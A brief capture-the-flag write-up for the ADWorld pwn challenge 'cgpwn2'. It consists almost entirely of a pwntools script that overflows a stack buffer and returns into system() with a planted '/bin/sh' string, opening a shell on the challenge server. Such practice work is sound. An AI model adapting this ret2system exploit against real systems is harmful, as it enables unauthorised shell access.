ADWorld Pwn cgpwn2

Looks like I'm starting to get the hang of this ^v^

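from pwn import *

p = remote("111.198.29.45", 55602)
p.sendlineafter(b"your name", b"/bin/sh")  # the name input places "/bin/sh" in memory
strAddr = 0x0804A080  # address where the name string ("/bin/sh") is stored
sysAddr = 0x08048420  # address used to call system
payload = b'0' * (0x26 + 0x4) + p32(sysAddr) + p32(0) + p32(strAddr)  # padding up to the return address, then system, a dummy return address, and the argument
print(len(payload))
p.sendlineafter(b"here:", payload)
p.interactive()  # hand the session over to the user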
